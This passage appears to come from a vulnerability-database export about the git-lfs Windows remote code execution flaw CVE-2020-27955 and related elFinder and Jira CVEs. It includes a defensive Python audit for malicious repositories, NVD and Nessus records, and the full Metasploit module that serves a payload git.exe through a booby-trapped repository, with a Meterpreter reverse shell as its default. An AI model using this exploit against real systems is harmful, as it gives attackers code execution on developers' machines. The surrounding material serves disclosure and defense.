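The Metasploit module, the Go proof of concept and the two Git LFS advisories above describe the same shape: a repository whose root holds a `git.exe` routed through the lfs filter, so the executable arrives at smudge time and is then picked up from the working directory by a Windows client. The block below is an added example, not git-lfs, Rapid7 or Dawid Golunski code: it writes the pointer and the `.gitattributes` line the module commits, and runs the pre-clone audit a Windows developer or a CI gate can apply to `git ls-tree -r HEAD` output. `lfs_pointer()` reimplements the public Git LFS pointer format and is not the module's `generate_pointer_file`; the sample tree, its object ids and the attribute file are constructed.

```python
"""Added example: the CVE-2020-27955 repository shape, and an audit that catches it."""
import fnmatch
import hashlib
import re
from typing import Dict, List, Tuple

# File names the advisories above say git-lfs resolves from the working directory
# on Windows. Windows also honours the other PATHEXT extensions; widen the set if
# your policy should cover them (this example's assumption, not from the advisories).
SHADOW_NAMES = {"git.exe", "git.bat"}


def lfs_pointer(blob: bytes) -> str:
    """Git LFS pointer (spec v1) for blob. The pointer is what the commit holds,
    so a review of the diff never shows the executable bytes; the real object is
    fetched at checkout, when git-lfs spawns `git` and a Windows client finds
    .\\git.exe in the freshly cloned tree before anything on PATH."""
    oid = hashlib.sha256(blob).hexdigest()
    return f"version https://git-lfs.github.com/spec/v1\noid sha256:{oid}\nsize {len(blob)}\n"


def lfs_attribute(path: str) -> str:
    """The .gitattributes line the module writes for its payload file."""
    return f"{path} filter=lfs diff=lfs merge=lfs\n"


def parse_gitattributes(text: str) -> Dict[str, List[str]]:
    """pattern -> attribute tokens, e.g. 'git.exe' -> ['filter=lfs', 'diff=lfs', 'merge=lfs']."""
    rules: Dict[str, List[str]] = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            pattern, *attrs = line.split()
            rules[pattern] = attrs
    return rules


def parse_ls_tree(text: str) -> List[Tuple[str, str, str]]:
    """(mode, type, path) from `git ls-tree -r HEAD` lines: '<mode> <type> <sha>\\t<path>'."""
    entries = []
    for line in text.splitlines():
        m = re.match(r"(\d{6}) (\w+) ([0-9a-f]{40})\t(.+)$", line)
        if m:
            entries.append((m.group(1), m.group(2), m.group(4)))
    return entries


def lfs_tracked(path: str, rules: Dict[str, List[str]]) -> bool:
    """True if a .gitattributes rule carrying filter=lfs matches the path (exact or glob)."""
    name = path.rsplit("/", 1)[-1]
    return any(
        "filter=lfs" in attrs and (pattern in (path, name) or fnmatch.fnmatch(name, pattern))
        for pattern, attrs in rules.items()
    )


def audit_tree(ls_tree_text: str, gitattributes_text: str) -> List[str]:
    """Findings for a repository that would trigger CVE-2020-27955 / CVE-2021-21237
    when cloned on Windows: a git.exe/git.bat blob anywhere in the tree (the root
    is the case the module uses), marked LFS-tracked when the payload bytes would
    only arrive through the smudge filter."""
    rules = parse_gitattributes(gitattributes_text)
    findings = []
    for mode, objtype, path in parse_ls_tree(ls_tree_text):
        if objtype != "blob" or path.rsplit("/", 1)[-1].lower() not in SHADOW_NAMES:
            continue
        tag = ", LFS-tracked" if lfs_tracked(path, rules) else ""
        findings.append(f"{path} (mode {mode}{tag})")
    return findings


# Constructed sample: the tree the module builds (.gitattributes + git.exe pointer)
# plus an innocent file. The object ids are made up.
SAMPLE_GITATTRIBUTES = lfs_attribute("git.exe")
SAMPLE_LS_TREE = (
    "100644 blob 3b18e512dba79e4c8300dd08aeb37f8e728b8dad\t.gitattributes\n"
    "100755 blob 5c0b4c9a1c4d4d3f7d0f8a61cbe3c7e1a3b0c2d4\tgit.exe\n"
    "100644 blob 9daeafb9864cf43055ae93beb0afd6c7d144bfa4\tREADME.md\n"
)

if __name__ == "__main__":
    print(lfs_pointer(b"MZ\x90\x00 constructed stand-in for the PE payload"))
    print(audit_tree(SAMPLE_LS_TREE, SAMPLE_GITATTRIBUTES))
```

The audit is deliberately run on `ls-tree` output rather than on a checkout: by the time the files are on disk a vulnerable client has already executed the smudge filter. Fetch with `git clone --no-checkout` (or inspect the bare repository on the server side), run the audit, and only then check out.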
## Mirrors on 0day.today

The exploits above are also carried by 0day.today with the same source; the records, without repeating the code:

* 1337DAY-ID-36761, "elFinder Archive Command Injection Exploit" (CVE-2021-32682), published 2021-09-15, https://0day.today/exploit/description/36761 (source https://0day.today/exploit/36761): the Packet Storm 164173 Metasploit module. CVSS v3.1 9.8 Critical (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), CVSS v2 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P).
* 1337DAY-ID-35926, "Atlassian JIRA 8.11.1 - User Enumeration Exploit" (CVE-2020-14181), published 2021-03-10, https://0day.today/exploit/description/35926 (source https://0day.today/exploit/35926): the Packet Storm 161730 script. CVSS v3.1 5.3 Medium (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N), CVSS v2 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N).
* 1337DAY-ID-35186, "git-lfs Remote Code Execution Exploit" (CVE-2020-27955), published 2020-11-08, https://0day.today/exploit/description/35186 (source https://0day.today/exploit/35186): the Packet Storm 159923 Go proof of concept, described as "Proof of concept git-lfs remote code execution exploit written in Go. Affects Git, GitHub CLI, GitHub Desktop, Visual Studio, GitKraken, SmartGit, SourceTree, and more." CVSS v3.1 9.8 Critical (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), CVSS v2 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C).
* A further 0day.today record (last seen 2022-04-11; the export breaks off before its id and URL) for the Packet Storm 164180 Metasploit module, described as: "This Metasploit module exploits a critical vulnerability in Git Large File Storage (Git LFS), an open source Git extension for versioning large files, which allows attackers to achieve remote code execution if the Windows-using victim is tricked into cloning the attacker’s malicious repository using a vulnerable Git version control tool." CVSS v3 severity Critical.
"integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-17T00:00:00", "type": "zdt", "title": "Git git-lfs Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2021-09-17T00:00:00", "id": "1337DAY-ID-36763", "href": "https://0day.today/exploit/description/36763", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Git\n include Msf::Exploit::Git::Lfs\n include Msf::Exploit::Git::SmartHttp\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::FileDropper\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Git Remote Code Execution via git-lfs (CVE-2020-27955)',\n 'Description' => %q{\n A critical vulnerability (CVE-2020-27955) in Git Large File Storage (Git LFS), an open source Git extension for\n versioning large files, allows attackers to achieve remote code execution if the Windows-using victim is tricked\n into cloning the attacker\u2019s malicious repository using a vulnerable Git version control tool\n },\n 'Author' => [\n 'Dawid Golunski ', # Discovery\n 'space-r7', # Guidance, 
git mixins\n 'jheysel-r7' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2020-27955'],\n ['URL', 'https://www.helpnetsecurity.com/2020/11/05/cve-2020-27955/']\n ],\n 'DisclosureDate' => '2020-11-04', # Public disclosure\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Git LFS <= 2.12',\n {\n 'Platform' => ['win']\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'WfsDelay' => 10\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n ARTIFACTS_ON_DISK\n ]\n }\n )\n )\n\n register_options([\n OptString.new('GIT_URI', [ false, 'The URI to use as the malicious Git instance (empty for random)', '' ])\n ])\n deregister_options('RHOSTS')\n end\n\n def setup_repo_structure\n payload_fname = 'git.exe'\n @hook_payload = generate_payload_exe\n\n ptr_file = generate_pointer_file(@hook_payload)\n git_payload_ptr = GitObject.build_blob_object(ptr_file)\n\n git_attr_fname = '.gitattributes'\n git_attr_content = \"#{payload_fname} filter=lfs diff=lfs merge=lfs\"\n git_attr_obj = GitObject.build_blob_object(git_attr_content)\n\n register_dir_for_cleanup('.git')\n register_files_for_cleanup(git_attr_fname)\n\n # root of repository\n tree_ent =\n [\n {\n mode: '100644',\n file_name: git_attr_fname,\n sha1: git_attr_obj.sha1\n },\n {\n mode: '100755',\n file_name: payload_fname,\n sha1: git_payload_ptr.sha1\n }\n ]\n\n tree_obj = GitObject.build_tree_object(tree_ent)\n commit = GitObject.build_commit_object(tree_sha1: tree_obj.sha1)\n\n @git_objs =\n [\n commit, tree_obj, git_attr_obj, git_payload_ptr\n ]\n\n @refs =\n {\n 'HEAD' => 'refs/heads/master',\n 'refs/heads/master' => commit.sha1\n }\n end\n\n #\n # Determine whether or not the target is exploitable based on the User-Agent header returned from the client.\n # The git version must be equal or less than 2.29.2 
while git-lfs needs to be equal or less than 2.12.0 to be\n # exploitable by this vulnerability.\n #\n # Returns +true+ if the target is suitable, else fail_with descriptive message\n #\n def target_suitable?(user_agent)\n info = fingerprint_user_agent(user_agent)\n if info[:ua_name] == Msf::HttpClients::UNKNOWN\n fail_with(Failure::NoTarget, \"The client's User-Agent string was unidentifiable: #{info}. The client needs to clone the malicious repo on windows with a git version less than 2.29.0\")\n end\n\n if info[:os_name] == 'Windows' &&\n ((info[:ua_name] == Msf::HttpClients::GIT && Rex::Version.new(info[:ua_ver]) <= Rex::Version.new('2.29.2')) ||\n (info[:ua_name] == Msf::HttpClients::GIT_LFS && Rex::Version.new(info[:ua_ver]) <= Rex::Version.new('2.12')))\n true\n else\n fail_with(Failure::NotVulnerable, \"The git client needs to be running on Windows with a version equal or less than 2.29.2 while git-lfs needs to be equal or less than 2.12.0. The user agent, #{info[:ua_name]}, found was running on, #{info[:os_name]} and was at version: #{info[:ua_ver]}\")\n end\n end\n\n def on_request_uri(cli, req)\n target_suitable?(req.headers['User-Agent'])\n if req.uri.include?('git-upload-pack')\n request = Msf::Exploit::Git::SmartHttp::Request.parse_raw_request(req)\n case request.type\n when 'ref-discovery'\n response = send_refs(request)\n when 'upload-pack'\n response = send_requested_objs(request)\n else\n fail_with(Failure::UnexpectedReply, 'Git client did not send a valid request')\n end\n else\n response = handle_lfs_objects(req, @hook_payload, @git_addr)\n unless response.code == 200\n cli.send_response(response)\n fail_with(Failure::UnexpectedReply, 'Failed to respond to Git client\\'s LFS request')\n end\n end\n cli.send_response(response)\n end\n\n def create_git_uri\n \"/#{Faker::App.name.downcase}.git\".gsub(' ', '-')\n end\n\n def primer\n @git_repo_uri = datastore['GIT_URI'].empty? ? 
create_git_uri : datastore['GIT_URI']\n @git_addr = URI.parse(get_uri).merge(@git_repo_uri)\n print_status(\"Git repository to clone: #{@git_addr}\")\n hardcoded_uripath(@git_repo_uri)\n hardcoded_uripath(\"/#{Digest::SHA256.hexdigest(@hook_payload)}\")\n end\n\n def handle_lfs_objects(req, hook_payload, git_addr)\n git_hook_obj = GitObject.build_blob_object(hook_payload)\n\n case req.method\n when 'POST'\n print_status('Sending payload data...')\n response = get_batch_response(req, git_addr, git_hook_obj)\n fail_with(Failure::UnexpectedReply, 'Client request was invalid') unless response\n when 'GET'\n print_status('Sending LFS object...')\n response = get_requested_obj_response(req, git_hook_obj)\n fail_with(Failure::UnexpectedReply, 'Client sent invalid request') unless response\n else\n fail_with(Failure::UnexpectedReply, 'Unable to handle client\\'s request')\n end\n\n response\n end\n\n def send_refs(req)\n fail_with(Failure::UnexpectedReply, 'Git client did not perform a clone') unless req.service == 'git-upload-pack'\n\n response = get_ref_discovery_response(req, @refs)\n fail_with(Failure::UnexpectedReply, 'Failed to build a proper response to the ref discovery request') unless response\n\n response\n end\n\n def send_requested_objs(req)\n upload_pack_resp = get_upload_pack_response(req, @git_objs)\n unless upload_pack_resp\n fail_with(Failure::UnexpectedReply, 'Could not generate upload-pack response')\n end\n\n upload_pack_resp\n end\n\n def exploit\n setup_repo_structure\n super\n end\nend\n", "sourceHref": "https://0day.today/exploit/36763", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-08-02T18:48:54", "description": "elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Several vulnerabilities affect elFinder 2.1.58. 
These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. The issues were patched in version 2.1.59. As a workaround, ensure the connector is not exposed without authentication.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-14T17:15:00", "type": "cve", "title": "CVE-2021-32682", "cwe": ["CWE-22", "CWE-78", "CWE-918"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32682"], "modified": "2022-08-02T16:15:00", "cpe": [], "id": "CVE-2021-32682", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-32682", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-25T21:49:44", "description": "Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the /ViewUserHover.jspa endpoint. 
The affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2020-09-17T01:15:00", "type": "cve", "title": "CVE-2020-14181", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14181"], "modified": "2022-03-25T18:14:00", "cpe": [], "id": "CVE-2020-14181", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-14181", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2022-03-23T16:48:41", "description": "Git LFS 2.12.0 allows Remote Code Execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-05T15:15:00", "type": "cve", "title": 
"CVE-2020-27955", "cwe": ["CWE-427"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2021-12-16T20:35:00", "cpe": ["cpe:/a:git_large_file_storage_project:git_large_file_storage:2.12.0"], "id": "CVE-2020-27955", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-27955", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:git_large_file_storage_project:git_large_file_storage:2.12.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-04-11T18:47:34", "description": "The Library File Manager WordPress plugin before 5.2.3 is using an outdated version of the elFinder library, which is know to be affected by security issues (CVE-2021-32682), and does not have any authorisation as well as CSRF checks in its connector AJAX action, allowing any authenticated users, such as subscriber to call it. 
Furthermore, as the options passed to the elFinder library does not restrict any file type, users with a role as low as subscriber can Create/Upload/Delete Arbitrary files and folders.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-04-04T16:15:00", "type": "cve", "title": "CVE-2022-0403", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32682", "CVE-2022-0403"], "modified": "2022-04-11T16:16:00", "cpe": [], "id": "CVE-2022-0403", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-0403", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T13:36:21", "description": "Git LFS is a command line extension for managing large files with Git. On Windows, if Git LFS operates on a malicious repository with a git.bat or git.exe file in the current directory, that program would be executed, permitting the attacker to execute arbitrary code. This does not affect Unix systems. This is the result of an incomplete fix for CVE-2020-27955. 
This issue occurs because on Windows, Go includes (and prefers) the current directory when the name of a command run does not contain a directory separator. Other than avoiding untrusted repositories or using a different operating system, there is no workaround. This is fixed in v2.13.2.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-15T18:15:00", "type": "cve", "title": "CVE-2021-21237", "cwe": ["CWE-426"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955", "CVE-2021-21237"], "modified": "2021-01-29T22:18:00", "cpe": [], "id": "CVE-2021-21237", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21237", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "nessus": [{"lastseen": "2022-07-14T14:32:35", "description": "According to its self-reported version number, the instance of Atlassian Jira hosted on the remote web server is prior to 7.3.16, 8.x < 8.5.7 or 8.6.x < 8.12.0. 
It is, therefore, affected by an information disclosure vulnerability in the ViewUserHover.jspa endpoint allowing an unauthenticated user to enumerate users.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2021-07-02T00:00:00", "type": "nessus", "title": "Atlassian Jira 8.6.x < 8.12.0 Information Disclosure", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-14181"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112855", "href": "https://www.tenable.com/plugins/was/112855", "sourceData": "No source data", "cvss": {"score": 5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-07-14T14:32:32", "description": "According to its self-reported version number, the instance of Atlassian Jira hosted on the remote web server is prior to 7.3.16, 8.x < 8.5.7 or 8.6.x < 8.12.0. 
It is, therefore, affected by an information disclosure vulnerability in the ViewUserHover.jspa endpoint allowing an unauthenticated user to enumerate users.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2021-07-02T00:00:00", "type": "nessus", "title": "Atlassian Jira 8.x < 8.5.7 Information Disclosure", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-14181"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112854", "href": "https://www.tenable.com/plugins/was/112854", "sourceData": "No source data", "cvss": {"score": 5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-06-11T16:03:36", "description": "According to its self-reported version number, the instance of Atlassian Jira hosted on the remote web server is prior to 7.3.16, or is 8.x < 8.5.7, or 8.6.x < 8.12.0. 
It is, therefore, affected by an information disclosure vulnerability.\nAn unauthenticated, remote attacker can exploit this, via the /ViewUserHover.jspa endpoint, in order to enumerate users.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2020-09-24T00:00:00", "type": "nessus", "title": "Atlassian Jira < 7.13.16 / 8.x < 8.5.7 / 8.6.x < 8.12.0 User Enumeration (JRASERVER-71560)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-14181"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:atlassian:jira"], "id": "JIRA_8_12_0_JRASERVER-71560.NASL", "href": "https://www.tenable.com/plugins/nessus/140769", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140769);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2020-14181\");\n script_xref(name:\"IAVA\", value:\"2020-A-0432\");\n\n script_name(english:\"Atlassian Jira < 7.13.16 / 8.x < 8.5.7 / 8.6.x < 8.12.0 User Enumeration (JRASERVER-71560)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a web application that is affected by a user enumeration vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the instance of Atlassian Jira hosted on the remote web server is prior\nto 7.3.16, or is 8.x < 8.5.7, or 8.6.x < 8.12.0. 
It is, therefore, affected by an information disclosure vulnerability.\nAn unauthenticated, remote attacker can exploit this, via the /ViewUserHover.jspa endpoint, in order to enumerate users.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://jira.atlassian.com/browse/JRASERVER-71560\");\n # https://confluence.atlassian.com/jirasoftware/issues-resolved-in-7-13-16-1018767296.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a89d4437\");\n # https://confluence.atlassian.com/jirasoftware/issues-resolved-in-8-5-7-1018767308.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0c982660\");\n # https://confluence.atlassian.com/jirasoftware/issues-resolved-in-8-12-0-1019380847.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f7758971\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Jira version 7.13.16, 8.5.7, 8.12.0 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-14181\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/09/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/24\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:jira\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"jira_detect.nasl\", \"atlassian_jira_win_installed.nbin\", \"atlassian_jira_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Atlassian JIRA\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp_info = vcf::combined_get_app_info(app:'Atlassian JIRA');\n\nconstraints = [\n { 'min_version' : '0', 'fixed_version' : '7.13.16' },\n { 'min_version' : '8.0.0', 'fixed_version' : '8.5.7' },\n { 'min_version' : '8.6.0', 'fixed_version' : '8.12.0' }\n];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-07-14T14:32:29", "description": "According to its self-reported version number, the instance of Atlassian Jira hosted on the remote web server is prior to 7.3.16, 8.x < 8.5.7 or 8.6.x < 8.12.0. 
